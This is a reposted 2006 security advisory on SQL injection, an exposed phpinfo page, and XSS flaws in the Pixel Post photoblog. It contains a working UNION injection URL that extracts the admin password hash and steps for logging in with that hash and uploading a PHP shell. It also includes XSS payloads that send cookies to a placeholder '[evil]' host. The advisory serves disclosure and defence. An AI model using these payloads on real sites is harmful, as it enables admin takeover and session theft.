Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11699
HistoryMar 05, 2006 - 12:00 a.m.

Pixel Post Multiple Vulnerabilities

2006-03-0500:00:00
vulners.com
47
JSON

/*

[N]eo [S]ecurity [T]eam [NST] - Advisory #19 - 04/03/06

Program: Pixel Post
Homepage: http://www.pixelpost.org/
Vulnerable Versions: 1.4.3, 1.5 beta1 and possibly lower versions.
Risk: High!
Impact: XSS, and SQL Injection providing full access to admin area, providing upload any type of files
capabilities… :D

-==Pixel Post Multiple Vulnerabilities==-

  • Description

Pixelpost is a photoblog application powered by PHP and MySQL. It's developed and maintained by
photobloggers who like to keep the meaning behind photoblogging in mind, the photography, and not about the
311 hacks you would have to get through to get your regular blog to work like…

  • Tested

localhost + many sites

  • Explotation

1)

Vulnerable code:

magic_quotes_gpc must be Off in order to exploit it.

==[ index.php 135-147 ]==========================
[…]
if($_GET['showimage'] == "") {
$row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where datetime<='$cdate' order by
datetime DESC limit 0,1");
} else {
$row = sql_array("select * from ".$pixelpost_db_prefix."pixelpost where
(id='".$_GET['showimage']."')");
}
if(!$row['image']) {
echo "Coming Soon! Nothing to show. No image to show here!";
exit;
}
$image_name = $row['image'];
$image_title = pullout($row['headline']);
$image_id = $row['id'];
$image_datetime = $row['datetime'];
[…]
==[ end index.php ]==========================

$showimage is the variable that is not properly sanitized (or not at all) and it's on line 138 that we can
get advantage from this.

Since the application prevents PHP or MySQL Errors from being shown, we have to fetch the data replacing
the one that was supposed to be fetched. So that $row[] is going to fetch what we specify and then print it
on the page.

With this vulnerability we can fetch almost any data from the database, and from any tables.

PoC:

http://[site]/[pixelpost_path]/?showimage=')%20UNION%20SELECT%20template%20as%20id,
%20email%20as%20headline,%20admin%20as%20datetime,%20password%20as%20body,
%20sitetitle%20as%20category,%20langfile%20as%20image%20FROM%20pixelpost_config/*

With this you can see on the frontpage, the username of the admin, and below resides the md5 hash of the
admin.

It's not necesarry to crack it since you can log in to the admin through a cookie with the md5 hash.

pixelpost_admin=[hash]

Once having access to the admin area, you can upload any type of files, since file types or extensions are
not checked.

So you can upload a PHP Shell or whatever. And depending on Server Configuration gain system access.

2)

Also by default you can see the System Configuration by viewing:

http://[site]/[pixelpost_path]/includes/phpinfo.php

==[ includes/phpinfo.php ]==========================
<?
phpinfo();
?>
==[ end includes/phpinfo.php ]======================

Which isn't restricted at all.

3)

Another SQL Injection resides when modifying the USER_AGENT, HTTP_REFERER and HTTP_HOST

The script doesn't sanitize this variables at all in includes/functions.php

==[ includes/functions.php 159-183 ]==========================
[…]
function book_visitor($str)
{
// book a visitor
$datetime = gmdate("Y-m-d H:i:s",gmdate("U")+(3600 * $cfgrow['timezone']));
$host = $_SERVER['HTTP_HOST'];
$referer = $_SERVER['HTTP_REFERER'];

    // don&#39;t book a referer from self
    $refererhost = parse_url&#40;$referer&#41;;
    $refererhost = $refererhost[&#39;host&#39;];
    if&#40;$refererhost == $host&#41;
    {
    $referer = &quot;&quot;;
    }
    $ua = $_SERVER[&#39;HTTP_USER_AGENT&#39;];
    $ip = $_SERVER[&#39;REMOTE_ADDR&#39;];
    $ruri = $_SERVER[&#39;REQUEST_URI&#39;];
    // ### if cookie lastvisit not set, count the people!
    if&#40;!isset&#40;$_COOKIE[&#39;lastvisit&#39;]&#41;&#41;
    {
            $query = &quot;insert into $str&#40;id,datetime,host,referer,ua,ip,ruri&#41;
            VALUES&#40;&#39;NULL&#39;,&#39;$datetime&#39;,&#39;$host&#39;,&#39;$referer&#39;,&#39;$ua&#39;,&#39;$ip&#39;,&#39;$ruri&#39;&#41;&quot;;
    $result = mysql_query&#40;$query&#41;;
    }

}
[…]
==[ end includes/functions.php ]==============================

4)

You can perform a XSS attack when commenting a post because the comment, the name, the url, and nor the
email are properly sanitized.

Comment:
<img src="javascript:alert('xss')"> (IE and Opera)
<img src="javascript:document.location='http://[evil]/
cookie.php?cookie='+document.cookie"> (Steal cookies)

<a href="javascript:alert('xss')">sarasa</a> (IE, Opera, Mozilla and probably all major browsers, but the
user must click the link in order to succed)
<a href="javascript:document.location='http://[evil]/cookie.php?cookie='+document.cookie">sarasa</a> (Steal
cookies)

There are lots of things you can do with a bit of imagination.

The application was not fully tested and many other vulnerabilities are probably present (Almost sure!)

  • References

http://www.neosecurityteam.net/index.php?action=advisories&amp;id=19

  • Credits

Discovered by Knightmare -> mr.knightmarex [at] gmail [at] com

[ 3KLabs ] :: [ http://www.3klabs.com/ ]

And Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/

  • Greets

Mike
Guille
Zeus54
HaCkZaTaN
K4P0
Daemon21
Link
LINUX

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */

JSON